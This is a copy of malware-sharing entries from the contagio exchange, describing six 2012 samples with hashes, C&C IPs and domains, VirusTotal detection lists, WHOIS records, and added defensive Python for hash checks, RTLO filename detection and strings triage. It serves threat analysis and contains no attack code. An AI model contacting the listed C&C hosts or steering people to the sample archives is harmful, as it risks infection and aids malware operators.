Channel: contagio malware exchange

001 - Crime - Bredolab - Email link - Trojan - Feb 2012

 MD5 EE0168C4D752DB3720E005B0929EAB7D

Download (pass infected)




Name UPS_Invoice_02142012.PDF.exe
Category
crime
type trojan
vector email link

callback IP 77.79.6.191, 193.106.172.227
URLs hxxp://core1.ko2-20d-bbnet1.lax.core02.net/0463/1.php
DNS query core1.ko2-20d-bbnet1.lax.core02.net
Sample credit anonymous
Other links 
http://www.mcafee.com/threat-intelligence/malware/default.aspx?id=835902

http://www.threatexpert.com/report.aspx?md5=9ee2136ed046f5d0d7fce32ab9a5c36a
Disclaimer: no analysis was done on this sample; the name is taken from the AV detection names.




Virustotal
SHA256:     cadc5e5de727049c9efbbe262f6483f404818b6ea784ea66d155a9b229bc085c
SHA1:     720f2d03eaad4e23ed22cf1886f1bb9abb0617ca
MD5:     ee0168c4d752db3720e005b0929eab7d
File size:     421.5 KB ( 431616 bytes )
File name:     720f2d03eaad4e23ed22cf1886f1bb9abb0617ca.bin
File type:     Win32 EXE
Detection ratio:     17 / 43
Analysis date:     2012-02-19 00:32:02 UTC ( 1 week, 6 days ago )
AhnLab-V3     Win-Trojan/Spyeyes.431616.B     20120215
AVG     Win32/Cryptor     20120216
BitDefender     Trojan.Generic.KDV.533579     20120216
ClamAV     BC.Heuristic.Trojan.SusPacked.BF-6.A     20120216
Comodo     UnclassifiedMalware     20120215
Emsisoft     Virus.Win32.Cryptor!IK     20120216
F-Secure     Trojan.Generic.KDV.533579     20120216
GData     Trojan.Generic.KDV.533579     20120216
Ikarus     Virus.Win32.Cryptor     20120216
Kaspersky     HEUR:Trojan.Win32.Generic     20120216
McAfee     Generic.tfr!bu     20120216
McAfee-GW-Edition     Heuristic.BehavesLike.Win32.ModifiedUPX.C     20120215
Microsoft     Trojan:Win32/EyeStye.N     20120215
NOD32     a variant of Win32/Kryptik.AAQK     20120216
nProtect     Trojan.Generic.KDV.533579     20120215
Sophos     Mal/ZboCheMan-A     20120215
TrendMicro-HouseCall     -     20120216
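Every entry on this page ships as a password-protected archive (password "infected") next to the sample's MD5/SHA1/SHA256. Before a sample goes into a sandbox it is worth checking that what came out of the archive is the file the entry describes, and that check is easy to get subtly wrong (mixed-case hex, entries that list only an MD5, members extracted to disk by accident). The script below is an added example, not code from the contagio post: it opens the archive in memory, hashes every member and compares against whichever hashes were listed. The archive it runs on is a constructed stand-in built in memory (the standard library cannot write encrypted zips, so it is unencrypted and the password is ignored on read), and the hash it checks is computed from that stand-in, not one of the values listed above.

```python
import hashlib
import io
import zipfile

# Password every archive on this page uses.
ARCHIVE_PASSWORD = b"infected"

# Hash names as VirusTotal lists them, mapped to hashlib constructors.
HASH_ALGOS = {"md5": hashlib.md5, "sha1": hashlib.sha1, "sha256": hashlib.sha256}


def hash_bytes(data: bytes) -> dict:
    """md5/sha1/sha256 hex digests of data, lower-case, as VirusTotal prints them."""
    return {name: ctor(data).hexdigest() for name, ctor in HASH_ALGOS.items()}


def verify_archive(zip_bytes: bytes, expected: dict, pwd: bytes = ARCHIVE_PASSWORD) -> dict:
    """Open the archive in memory, hash every member, compare with `expected`.

    `expected` maps a member name to {hash_name: hex_digest}. Only the hash
    names listed are checked, so an entry that gives just an MD5 still
    verifies. Comparison is case-insensitive because the posts mix cases
    ("MD5 EE0168C4..." in the entry, "ee0168c4..." in the VT block).
    Members are read into memory only; nothing is written to disk.
    """
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info.filename, pwd=pwd)
            digests = hash_bytes(data)
            want = {k.lower(): v.lower() for k, v in expected.get(info.filename, {}).items()}
            mismatch = [k for k, v in want.items() if digests.get(k) != v]
            report[info.filename] = {
                "size": len(data),
                "hashes": digests,
                "listed": bool(want),           # False: no hash was given for this member
                "ok": bool(want) and not mismatch,
                "mismatch": mismatch,
            }
    return report


def build_constructed_archive(members: dict) -> bytes:
    """In-memory zip of {name: bytes}, standing in for a download. The standard
    library cannot write encrypted zips, so this one is unencrypted; zipfile
    then ignores the password on read. For a real, encrypted contagio archive
    the same verify_archive() call applies unchanged."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed stand-in for the sample: not a real PE, just bytes to hash.
    sample = b"MZ" + b"\x00" * 62 + b"constructed stand-in, not a real PE"
    archive = build_constructed_archive({"UPS_Invoice_02142012.PDF.exe": sample})
    listed = {"UPS_Invoice_02142012.PDF.exe": {"MD5": hash_bytes(sample)["md5"].upper()}}
    for name, r in verify_archive(archive, listed).items():
        status = "OK" if r["ok"] else f"MISMATCH on {r['mismatch']}"
        print(f"{name}: {r['size']} bytes sha256={r['hashes']['sha256']} {status}")
```

A member with no listed hash is reported with `listed: False` and `ok: False` rather than silently passing; treat that as "unverified", not "verified".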


193.106.172.227
Host reachable, 144 ms. average
193.106.172.0 - 193.106.175.255
IQHost Ltd
Russian Federation
Maxim Sukhomlin
IQHOST Company
Dinamo 15-22
phone: +7 903 2871074
max@iqhost.ru





77.79.6.191
hst-6-191.duomenucentras.lt
Host reachable, 133 ms. average
77.79.6.0 - 77.79.7.255
Webhosting, collocation services
Lithuania
Remigijus Laurutis
Tilzes 74-320
LT-76247 Siauliai
Lithuania
phone: +37041503500
abuse@aleja.lt

002 - Gov - Bundestrojaner - for government surveillance - Trojan - Oct 2011

MD5  930712416770A8D5E6951F3E38548691
D6791F5AA6239D143A22B2A15F627E72

Download (pass infected)




Name  Bundestrojaner
Category
crime
type trojan
vector  gov install
Sample credit anonymous
Other links  http://ccc.de/de/updates/2011/staatstrojaner





Virustotal
SHA256:     be36ce1e79ba6f97038a6f9198057abecf84b38f0ebb7aaa897fd5cf385d702f
SHA1:     e4f07b5a443cd99fd45cb5e1445ac2c1be4b455e
MD5:     930712416770a8d5e6951f3e38548691
File size:     352.0 KB ( 360448 bytes )
File name:     mfc42ul.dll
File type:     Win32 DLL
Tags:     armadillo
Detection ratio:     39 / 43
Analysis date:     2012-02-13 16:41:55 UTC ( 2 weeks, 4 days ago )
Antivirus     Result     Update
AhnLab-V3     Win-Trojan/R2d2.360448     20120213
AntiVir     TR/GruenFink.1     20120213
Antiy-AVL     Backdoor/Win32.R2D2.gen     20120213
Avast     Win32:R2D2-L [Trj]     20120213
AVG     BackDoor.Generic14.BBFR     20120213
BitDefender     Trojan.Generic.6714587     20120213
ByteHero     -     20120211
CAT-QuickHeal     Backdoor.R2d2.a     20120213
ClamAV     Trojan.BTroj-1     20120213
Commtouch     W32/R2D2.A     20120213
Comodo     Backdoor.Win32.R2D2.~B1     20120213
DrWeb     BackDoor.RTwoDTwo.1     20120213
Emsisoft     Backdoor.Win32.R2D2!IK     20120213
eSafe     Win32.Backdoor.Earlt     20120213
eTrust-Vet     Win32/R2D2.A     20120213
F-Prot     W32/R2D2.A     20120213
F-Secure     Backdoor:W32/R2D2.A     20120213
Fortinet     W32/R2D2.A!tr.bdr     20120213
GData     Trojan.Generic.6714587     20120213
Ikarus     Backdoor.Win32.R2D2     20120213
Jiangmin     Backdoor/R2D2.c     20120212
K7AntiVirus     Backdoor     20120213
Kaspersky     Backdoor.Win32.R2D2.a     20120213
McAfee     BackDoor-FCA     20120213
McAfee-GW-Edition     BackDoor-FCA     20120212
Microsoft     Backdoor:Win32/R2d2.A     20120213
NOD32     Win32/R2D2.A     20120213
Norman     W32/R2D2.A     20120213
nProtect     Backdoor/W32.R2D2.360448     20120213
Panda     Trj/Bundestrojaner.A     20120213
PCTools     Backdoor.R2D2     20120207
Sophos     Troj/BckR2D2-A     20120213
SUPERAntiSpyware     -     20120206
Symantec     Backdoor.R2D2     20120213
TheHacker     Trojan/R2D2.a     20120213
TrendMicro     BKDR_R2D2.A     20120213
TrendMicro-HouseCall     BKDR_R2D2.A     20120213
VBA32     Trojan.Polizei     20120213
VIPRE     Backdoor.Win32.R2D2.a (v)     20120213
ViRobot     Backdoor.Win32.R2D2.360448     20120213
VirusBuster     Backdoor.R2D2!w/vENfl9bd8     20120213

This is #SPYWARE
---------------------------------
Huntsville PC Repair Computer Repair Virus Removal IT Services Huntsville Alabama
Posted 1 month ago by http://www.hsvpcrepair.com/
Component of the so-called 'Bundestrojaner' (German for "federal trojan") of the German government.

"#Bundestrojaner" is the slang word for a Trojan horse malware program initiated by German politicians and the German government to get access to each private PC connected to the Internet.


http://ccc.de/de/updates/2011/staatstrojaner
#malware #bundestrojaner #r2d2 #360448 #6714587
Posted 1 month, 3 weeks ago by Smartcom5
very useful spy tool
#malware #spamattachmentorlink #networkworm #drivebydownload #r2d2 #360448 #6714587
Posted 4 months, 2 weeks ago by anonymous
Bundestrojaner - 0zaptis -R2D2

Trojan Backdoor

#Bundestrojaner
#0zaptis
#R2D2
#malware #bundestrojaner #r2d2 #r2d2 #360448 #6714587
Posted 4 months, 2 weeks ago by Krypto_Graph
#malware #r2d2 #360448 #6714587
Virustotal

SHA256:     3407bf876e208f2dce3b43ccf5361c5e009ed3daf87571ba5107d10a05dc7bc4
SHA1:     7bd8d737460c1dbbfc4b250fb1b6b906ed643a2d
MD5:     d6791f5aa6239d143a22b2a15f627e72
File size:     5.3 KB ( 5376 bytes )
File name:     winsys32.sys
File type:     Win32 EXE
Detection ratio:     40 / 43
Analysis date:     2012-01-26 09:54:26 UTC ( 1 month, 1 week ago )

Antivirus     Result     Update
AhnLab-V3     Win-Trojan/R2d2.5376     20120125
AntiVir     TR/GruenFink.2     20120125
Antiy-AVL     Backdoor/Win32.R2D2.gen     20120126
Avast     Win32:R2D2-F [Trj]     20120126
AVG     BackDoor.Generic14.BBFQ     20120126
BitDefender     Backdoor.Agent.AAZH     20120126
ByteHero     -     20120125
CAT-QuickHeal     Trojan.R2d2.roo     20120125
ClamAV     Trojan.BTroj     20120126
Commtouch     W32/R2D2.A     20120126
Comodo     Backdoor.Win32.R2D2.B     20120125
DrWeb     BackDoor.RTwoDTwo.1     20120126
Emsisoft     Backdoor.Win32.R2D2!IK     20120126
eSafe     Win32.Backdoor.Earlt     20120125
eTrust-Vet     Win32/R2D2.A     20120125
F-Prot     W32/R2D2.A     20120125
F-Secure     Backdoor:W32/R2D2.A     20120126
Fortinet     W32/R2D2.A!tr.bdr     20120126
GData     Backdoor.Agent.AAZH     20120126
Ikarus     Backdoor.Win32.R2D2     20120126
Jiangmin     Backdoor/R2D2.a     20120125
K7AntiVirus     Backdoor     20120125
Kaspersky     Backdoor.Win32.R2D2.a     20120126
McAfee     BackDoor-FCA!sys     20120126
McAfee-GW-Edition     BackDoor-FCA!sys     20120126
Microsoft     Trojan:Win32/R2d2.A!rootkit     20120126
NOD32     Win32/R2D2.A     20120126
Norman     W32/R2D2.A     20120125
nProtect     Backdoor/W32.R2D2.5376     20120126
Panda     Trj/Bundestrojaner.A     20120125
PCTools     Backdoor.R2D2     20120126
Prevx     -     20120126
Rising     Trojan.Win32.Generic.12A1BF23     20120118
Sophos     Troj/BckR2D2-A     20120126
SUPERAntiSpyware     -     20120126
Symantec     Backdoor.R2D2     20120126
TheHacker     Trojan/R2D2.a     20120126
TrendMicro     RTKT_R2D2.A     20120126
TrendMicro-HouseCall     RTKT_R2D2.A     20120126
VBA32     Backdoor.R2D2.a     20120125
VIPRE     Trojan.Win32.R2D2.a!rootkit (v)     20120126
ViRobot     Backdoor.Win32.R2D2.5376     20120126
VirusBuster     Backdoor.R2D2!uglG32Y6ai0     20120126

Component of the so-called 'Bundestrojaner' (German for "federal trojan") of the German government.

"#Bundestrojaner" is the slang word for a Trojan horse malware program initiated by German politicians and the German government to get access to each private PC connected to the Internet.


http://ccc.de/de/updates/2011/staatstrojaner
#malware #bundestrojaner #r2d2 #aazh #5376
Posted 1 month, 3 weeks ago by Smartcom5
Bundestrojaner driver

#Bundestrojaner
#0zaptis
#R2D2
#malware #bundestrojaner #r2d2 #r2d2 #agent #aazh
Posted 4 months, 2 weeks ago by Krypto_Graph
malware of the Bundestrojaner
http://www.heise.de/newsticker/meldung/CCC-knackt-Bundestrojaner-1357670.html
#malware
Posted 4 months, 3 weeks ago by anonymous
Unsigned 32-bit kernel-mode driver with local privilege escalation, file planting, registry modification and keylogger functionality.

Part of the German Federal Republic trojan / (lawful?) spying tool.
#malware #r2d2 #aazh #agent
Posted 4 months, 3 weeks ago by anonymous
Government malware for citizen surveillance.
#earltwo #r2d2 #btroj

003 - APT - Taidoor - Email attachment - Trojan - Oct 2011 - RTLO


MD5:  E0F799CA5E8CEC5479235F5EC9E46FF7
Download (pass infected) 





Name RTLO Oct 2011
Category
APT
type trojan
vector  email attachment
Sample credit Mila
ThreatExpert
C&C
2.229.10.5 Italy
2.116.180.66 Italy
Drops a Word document as a decoy.
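"RTLO" in the entry title is the right-to-left override trick: a U+202E character inside the attachment name makes everything after it render reversed, so a screensaver executable can display as a document while the OS still dispatches on the real ".scr" extension. The entry does not give the original attachment name (VirusTotal shows it as t.scr), so the checker below, which is an added example and not part of the post, runs on a constructed name. It reports what a file browser would show, what extension will actually run, and whether the two disagree; it also flags the other Unicode bidi controls, since the same disguise works with them.

```python
# Unicode bidi controls abused to disguise a filename's real extension.
# U+202E RIGHT-TO-LEFT OVERRIDE is the classic one (the "RTLO" in the entry
# title); the others also reorder or isolate display and are flagged too.
BIDI_CONTROLS = {
    "\u202a": "LEFT-TO-RIGHT EMBEDDING",
    "\u202b": "RIGHT-TO-LEFT EMBEDDING",
    "\u202c": "POP DIRECTIONAL FORMATTING",
    "\u202d": "LEFT-TO-RIGHT OVERRIDE",
    "\u202e": "RIGHT-TO-LEFT OVERRIDE",
    "\u2066": "LEFT-TO-RIGHT ISOLATE",
    "\u2067": "RIGHT-TO-LEFT ISOLATE",
    "\u2068": "FIRST STRONG ISOLATE",
    "\u2069": "POP DIRECTIONAL ISOLATE",
}

# Extensions Windows executes directly; a disguised one of these is the payload.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs",
                   ".vbe", ".js", ".jse", ".wsf", ".hta", ".lnk", ".cpl"}


def displayed_name(name: str) -> str:
    """Approximate what a file browser renders: the run after a U+202E is shown
    reversed. A single override is the filename trick; nested embeddings are
    not modelled here."""
    if "\u202e" not in name:
        return name
    head, tail = name.split("\u202e", 1)
    tail = tail.replace("\u202c", "")  # U+202C would end the override early
    return head + tail[::-1]


def real_extension(name: str) -> str:
    """The extension the OS dispatches on: last '.'-suffix of the raw string
    with all bidi controls stripped, lower-cased."""
    cleaned = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    dot = cleaned.rfind(".")
    return cleaned[dot:].lower() if dot != -1 else ""


def analyze_filename(name: str) -> dict:
    """What the user sees, what the OS runs, and whether the two disagree."""
    controls = [(i, f"U+{ord(ch):04X}", BIDI_CONTROLS[ch])
                for i, ch in enumerate(name) if ch in BIDI_CONTROLS]
    shown = displayed_name(name)
    shown_dot = shown.rfind(".")
    shown_ext = shown[shown_dot:].lower() if shown_dot != -1 else ""
    real = real_extension(name)
    return {
        "bidi_controls": controls,
        "displayed": shown,
        "displayed_extension": shown_ext,
        "real_extension": real,
        "executable": real in EXECUTABLE_EXTS,
        # Disguise = a bidi control present AND the shown extension differs
        # from the one that will actually run.
        "suspicious": bool(controls) and real in EXECUTABLE_EXTS and shown_ext != real,
    }


if __name__ == "__main__":
    # Constructed attachment names, not the sample's real one (VT shows it as t.scr).
    for fn in ["report\u202excod.scr", "t.scr", "notes.txt"]:
        r = analyze_filename(fn)
        print(f"{r['displayed']!r:24} runs as {r['real_extension'] or '(none)':6} "
              f"controls={[c[1] for c in r['bidi_controls']]} suspicious={r['suspicious']}")
```

On a mail gateway or upload handler the useful rule is the last field: any bidi control in an attachment name is already abnormal, and one that changes the apparent extension of an executable is a block, not a warning.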


2.229.10.5
2-229-10-5.ip194.fastwebnet.it
Host reachable, 149 ms. average
2.229.10.0 - 2.229.10.255
Infrastructure for Fastwebs main location
IP addresses for Small Business Customer 41, public subnet
Italy
ip registration service
Via Caracciolo, 51
20155 Milano MI
Italy
phone: +39 02 45451
fax: +39 02 45451
IP.RegistrationService@fastweb.it


2.116.180.66
2.116.180.64 - 2.116.180.71
UNITESSILE S.P.A.
ROBERTO DORO
UNITESSILE S P A
VIA ROMA 15
33028 TOLMEZZO
Italy
phone: +394223277
fax: +39422327852

Virustotal
 SHA256:     03b893da011374ec48929a5bfa81bf951ea66cf6effc470a616af691a708b4dd
SHA1:     7a918cb5171a9b700d7ed7484cab657962c5c7b5
MD5:     e0f799ca5e8cec5479235f5ec9e46ff7
File size:     91.9 KB ( 94129 bytes )
File name:     t.scr
File type:     Win32 EXE
Detection ratio:     36 / 43
Analysis date:     2012-03-07 03:29:38 UTC ( 0 minutes ago )

Antivirus     Result     Update
AhnLab-V3     Trojan/Win32.Sasfis     20120305
AntiVir     BDS/Simbot.94129     20120306
Antiy-AVL     Trojan/Win32.Sasfis.gen     20120305
Avast     Win32:Malware-gen     20120306
AVG     Generic25.KVX     20120306
BitDefender     Trojan.Generic.KDV.364611     20120306
ByteHero     -     20120305
CAT-QuickHeal     Trojan.Sasfis.ckjz     20120307
ClamAV     -     20120306
Commtouch     W32/Trojan-Gypikon-based.BA!Maximus     20120306
Comodo     TrojWare.Win32.Trojan.Agent.Gen     20120306
DrWeb     Trojan.Click1.63215     20120306
Emsisoft     Backdoor.Win32.Simbot!IK     20120307
eSafe     -     20120305
eTrust-Vet     Win32/Fakedoc_i     20120306
F-Prot     W32/Trojan-Gypikon-based.BA!Maximus     20120306
F-Secure     Trojan.Generic.KDV.364611     20120306
Fortinet     W32/Dropper.ZW!tr     20120305
GData     Trojan.Generic.KDV.364611     20120306
Ikarus     Backdoor.Win32.Simbot     20120307
Jiangmin     Trojan/JboxGeneric.bmq     20120301
K7AntiVirus     Trojan     20120306
Kaspersky     Trojan.Win32.Sasfis.ckjz     20120306
McAfee     Generic Dropper.zw     20120307
McAfee-GW-Edition     Generic Dropper.zw     20120307
Microsoft     Backdoor:Win32/Simbot.gen     20120307
NOD32     probably a variant of Win32/Inject.MJPLDDL     20120306
Norman     W32/Suspicious_Gen2.RRKGX     20120304
nProtect     Trojan/W32.Agent.94129     20120306
Panda     Suspicious file     20120307
PCTools     Spyware.Perfect!rem     20120228
Sophos     Mal/Behav-043     20120307
SUPERAntiSpyware     -     20120307
Symantec     Spyware.Perfect     20120305
TheHacker     Trojan/Sasfis.ckho     20120306
TrendMicro     TROJ_GEN.R3EC1JR     20120306
TrendMicro-HouseCall     TROJ_GEN.R3EC1JR     20120307
VBA32     Trojan.Genome.soas     20120306
VIPRE     Trojan.Win32.Generic!BT     20120307
VirusBuster     Backdoor.Simbot!mG3bwuKLiV4     20120307


004 - Crime - Worm Gamarue.F or Yakes - Web - Worm - Feb 2012

MD5: c8cc880f91c832bc7c432507f7ca56d6

Download (pass infected)





Name  worm Gamarue.F
Category
Crime
type worm?
vector  Web drive by
Sample credit anonymous
File date: 2012-02-02

C&C
Domains do not resolve at the moment
business.greatespnjob.com
toptours.grantandamy.net
c388env.grasaker.se
touchme.graymalkin.us
ns1.afraid.org





strings

v'@.
XPTPSW
KERNEL32.DLL
ADVAPI32.DLL
USER32.DLL
LoadLibraryA
GetProcAddress
VirtualProtect
VirtualAlloc
VirtualFree
ExitProcess
RegCloseKey
GetMenu

Unicode Strings:
---------------------------------------------------------------------------
VS_VERSION_INFO
StringFileInfo
040904b0
Comments
CompanyName
Foxit Corporation
FileDescription
Foxit Reader 5.0, Best Reader for Everyday Use!
FileVersion
5, 0, 2, 0718
InternalName
Foxit Reader.exe
LegalCopyright
Copyright (C) 2009-2011 Foxit Corporation
LegalTrademarks
OriginalFilename
Foxit Reader.EXE
PrivateBuild
ProductName
Foxit Reader
ProductVersion
5, 0, 2, 0718
SpecialBuild
VarFileInfo
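Two things in the strings dump above are the whole static story of this sample: the import table is the six loader APIs a UPX-style stub needs (LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess) plus one throwaway import per extra DLL, which means the real imports only exist after unpacking, and the VS_VERSION_INFO block claims to be Foxit Reader 5.0.2 (SUPERAntiSpyware's "Gen-FakeFoxit" name below says the same). The script below is an added example, not code from the post: it parses a flattened strings dump of this shape, including the version keys whose values are empty (Comments, LegalTrademarks, PrivateBuild, SpecialBuild are each followed directly by the next key), and reports the packer-stub and masquerade indicators. The embedded sample input is the dump above, abridged by three key/value pairs to keep the block short.

```python
import re

# VS_VERSION_INFO string-table keys. In a flattened strings dump a key is
# followed by its value, or directly by the next key when the value is empty.
VERSION_KEYS = {"Comments", "CompanyName", "FileDescription", "FileVersion",
                "InternalName", "LegalCopyright", "LegalTrademarks", "OriginalFilename",
                "PrivateBuild", "ProductName", "ProductVersion", "SpecialBuild"}
VERSION_END = {"VarFileInfo", "Translation"}
# Loader APIs a UPX-style stub needs to rebuild the real import table at run time.
# A table that is only these plus one throwaway API per extra DLL (RegCloseKey for
# ADVAPI32, GetMenu for USER32 above) is a packed binary: its real imports are
# resolved after unpacking, so static import analysis sees nothing useful.
STUB_IMPORTS = {"LoadLibraryA", "GetProcAddress", "VirtualProtect",
                "VirtualAlloc", "VirtualFree", "ExitProcess"}
API_NAME = re.compile(r"^[A-Z][a-z]+[A-Za-z0-9]*$")   # CamelCase Win32 export name
DLL_NAME = re.compile(r"^[A-Za-z0-9_\-]+\.dll$", re.I)

# The strings dump from the entry above, abridged (three value pairs dropped).
SAMPLE_DUMP = """v'@.
XPTPSW
KERNEL32.DLL
ADVAPI32.DLL
USER32.DLL
LoadLibraryA
GetProcAddress
VirtualProtect
VirtualAlloc
VirtualFree
ExitProcess
RegCloseKey
GetMenu

Unicode Strings:
---------------------------------------------------------------------------
VS_VERSION_INFO
StringFileInfo
040904b0
Comments
CompanyName
Foxit Corporation
FileVersion
5, 0, 2, 0718
LegalTrademarks
OriginalFilename
Foxit Reader.EXE
PrivateBuild
ProductName
Foxit Reader
ProductVersion
5, 0, 2, 0718
SpecialBuild
VarFileInfo
"""


def parse_strings_dump(text: str) -> dict:
    """Split a strings dump into DLL names, probable imports and version info."""
    lines = [ln.strip() for ln in text.splitlines()]
    marks = [i for i, ln in enumerate(lines) if ln.lower().startswith("unicode strings")]
    split = marks[0] if marks else len(lines)
    ascii_part = [ln for ln in lines[:split] if ln]
    uni = [ln for ln in lines[split + 1:] if ln and set(ln) != {"-"}]  # drop blanks, dashes
    version, i = {}, 0
    while i < len(uni):
        key, nxt = uni[i], (uni[i + 1] if i + 1 < len(uni) else "")
        if key not in VERSION_KEYS:
            i += 1
        elif nxt in VERSION_KEYS or nxt in VERSION_END:
            version[key], i = "", i + 1          # empty value: next line is a key
        else:
            version[key], i = nxt, i + 2
    return {"dlls": [ln for ln in ascii_part if DLL_NAME.match(ln)],
            "imports": [ln for ln in ascii_part if API_NAME.match(ln)],
            "version": version}


def triage(text: str) -> dict:
    """Flag a packer-stub import table combined with borrowed vendor metadata."""
    p = parse_strings_dump(text)
    imports, v = set(p["imports"]), p["version"]
    stub_only = STUB_IMPORTS <= imports and len(imports - STUB_IMPORTS) <= len(p["dlls"])
    claimed = v.get("ProductName") or v.get("CompanyName") or ""
    return {
        "dlls": p["dlls"],
        "imports": sorted(imports),
        "packer_stub_imports": stub_only,
        "claimed_company": v.get("CompanyName", ""),
        "claimed_product": claimed,
        "claimed_original_filename": v.get("OriginalFilename", ""),
        # A packed body under a full vendor version block is the masquerade
        # pattern SUPERAntiSpyware's "Gen-FakeFoxit" name below refers to.
        "masquerade_suspected": stub_only and bool(claimed),
    }


if __name__ == "__main__":
    for k, val in triage(SAMPLE_DUMP).items():
        print(f"{k:26} {val}")
```

The stub heuristic is deliberately loose (six loader APIs present, at most one extra import per DLL); it is a reason to unpack before reading imports, not a verdict on its own.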


Virustotal
Detection ratio:     33 / 43
Analysis date:     2012-03-07 04:27:15 UTC ( 0 minutes ago )
Antivirus     Result     Update
AhnLab-V3     Trojan/Win32.Jorik     20120307
AntiVir     Worm/Gamarue.F.6     20120306
Antiy-AVL     Trojan/Win32.Yakes.gen     20120305
Avast     Win32:Rootkit-gen [Rtk]     20120306
AVG     Generic26.CNIK     20120306
BitDefender     Trojan.Generic.KDV.524519     20120307
ByteHero     -     20120305
CAT-QuickHeal     Trojan.Yakes.oqs     20120307
ClamAV     -     20120306
Commtouch     -     20120307
Comodo     TrojWare.Win32.Trojan.Agent.Gen     20120306
DrWeb     Trojan.DownLoader5.42407     20120307
Emsisoft     Trojan.Win32.Yakes!IK     20120307
eSafe     -     20120305
eTrust-Vet     -     20120306
F-Prot     -     20120306
F-Secure     Trojan.Generic.KDV.524519     20120306
Fortinet     W32/Yakes.OQS!tr     20120305
GData     Trojan.Generic.KDV.524519     20120306
Ikarus     Trojan.Win32.Yakes     20120307
Jiangmin     Trojan/Generic.wzzm     20120301
K7AntiVirus     Trojan     20120306
Kaspersky     Trojan.Win32.Yakes.oqs     20120306
McAfee     Generic.tfr!br     20120307
McAfee-GW-Edition     Generic.tfr!br     20120307
Microsoft     Worm:Win32/Gamarue.F     20120307
NOD32     a variant of Win32/Kryptik.ZXP     20120306
Norman     W32/Suspicious_Gen4.IAZE     20120304
nProtect     Trojan.Generic.KDV.524519     20120306
Panda     Generic Trojan     20120307
PCTools     -     20120228
Prevx     -     20120307
Rising     -     20120306
Sophos     Troj/Bredo-QG     20120307
SUPERAntiSpyware     Heur.Agent/Gen-FakeFoxit     20120307
Symantec     Trojan.Gen     20120305
TheHacker     Posible_Worm32     20120306
TrendMicro     TROJ_GEN.R3EC7B4     20120306
TrendMicro-HouseCall     TROJ_GEN.R3EC7B4     20120307
VBA32     Trojan.Yakes.oqs     20120306
VIPRE     Trojan.Win32.Generic!BT     20120307
ViRobot     -     20120307
VirusBuster     Trojan.Yakes!krnc77DoB8w     20120307

005 Crime - Blackhole Java CVE-2010-0840 - exploit - Web - Feb 2012

MD5:  1d26215f49beeefad8392e3e4e192e90
 
 Download (pass infected)


Name  Java CVE-2010-0840
Category
Crime
type exploit
vector  Web
Sample credit Mila


Virustotal
SHA256:     ee1fc2ec13e067824dbc950064115b6d08705955c3f7251f360183faca5193da
SHA1:     ccded41a7eae60999686b668fd4e4e8bd50b7aa5
MD5:     1d26215f49beeefad8392e3e4e192e90
File size:     5.2 KB ( 5361 bytes )
File name:     czhwjvgwkmarcoj.jar
File type:     ZIP
Detection ratio:     18 / 43
Analysis date:     2012-03-07 04:47:01 UTC ( 0 minutes ago )

Antivirus     Result     Update
AhnLab-V3     -     20120307
AntiVir     EXP/CVE-2010-0840     20120306
Antiy-AVL     Exploit/Java.Agent     20120305
Avast     Java:Agent-ACJ [Expl]     20120306
AVG     Java/Agent     20120306
BitDefender     Java.Exploit.CVE-2010-0840.Y     20120307
Comodo     UnclassifiedMalware     20120306
DrWeb     Java.Downloader.510     20120307
Emsisoft     Exploit.Java.Agent!IK     20120307
eTrust-Vet     -     20120306
F-Secure     Java.Exploit.CVE-2010-0840.Y     20120306
Fortinet     -     20120305
GData     Java.Exploit.CVE-2010-0840.Y     20120306
Ikarus     Exploit.Java.Agent     20120307
Jiangmin     Exploit.Java.ic     20120301
K7AntiVirus     -     20120306
Kaspersky     Exploit.Java.Agent.fw     20120306
McAfee     Downloader.a!bb3     20120307
McAfee-GW-Edition     Downloader.a!bb3     20120307
Microsoft     -     20120307
nProtect     Java.Exploit.CVE-2010-0840.Y     20120306
SUPERAntiSpyware     -     20120307
Symantec     Trojan.Maljava     20120305
TrendMicro-HouseCall     -     20120307

006 Crime - Blackhole CVE-2011-3544 - exploit - Web - Feb 2012

MD5:  85b0f524facca1b00f66e4a7ecb317e4

Download (pass infected)




Name Java CVE-2011-3544
Category
Crime
type exploit
vector  Web
Sample credit Mila


Virustotal
SHA256:     c13839854d0d950319ca97538f1cce6e050c5596d21251bb6e925647bf3e13d6
SHA1:     81a274046b2f3fc90c967a6ba26add941cd8ba41
MD5:     85b0f524facca1b00f66e4a7ecb317e4
File size:     4.7 KB ( 4840 bytes )
File name:     /30/xuaqxoewjlcsgsa.jar
File type:     ZIP
Detection ratio:     24 / 43
Analysis date:     2012-02-18 13:47:03 UTC ( 2 weeks, 3 days ago )

Antivirus     Result     Update
AhnLab-V3     -     20120216
AntiVir     EXP/CVE-2011-3544.U     20120217
Antiy-AVL     Exploit/Java.CVE-2011-3544     20120213
Avast     Java:CVE-2011-3544-M [Expl]     20120218
AVG     -     20120218
BitDefender     Trojan.Agent.ATMO     20120218
ByteHero     -     20120216
CAT-QuickHeal     -     20120218
ClamAV     -     20120218
Commtouch     -     20120218
Comodo     UnclassifiedMalware     20120217
DrWeb     Exploit.CVE2011-3544.4     20120218
Emsisoft     Trojan-Dropper.Agent!IK     20120218
eSafe     -     20120216
eTrust-Vet     -     20120217
F-Prot     -     20120218
F-Secure     Trojan.Agent.ATMO     20120218
Fortinet     Java/CVE_2011_3544.L!exploit     20120218
GData     Trojan.Agent.ATMO     20120218
Ikarus     Trojan-Dropper.Agent     20120218
Jiangmin     Exploit.Java.gv     20120217
K7AntiVirus     -     20120217
Kaspersky     Exploit.Java.CVE-2011-3544.l     20120218
McAfee     Downloader.a!b2d     20120218
McAfee-GW-Edition     Downloader.a!b2d     20120217
Microsoft     TrojanDownloader:Java/Comesis.A     20120218
NOD32     Java/Exploit.CVE-2011-3544.H     20120218
Norman     JAVA/Exploit.CVE-2011-3544.A     20120218
nProtect     Trojan.Agent.ATMO     20120218
Panda     -     20120218
PCTools     -     20120217
Prevx     -     20120218
Rising     -     20120217
Sophos     Troj/Java-BD     20120218
SUPERAntiSpyware     -     20120206
Symantec     Trojan.Gen.2     20120218
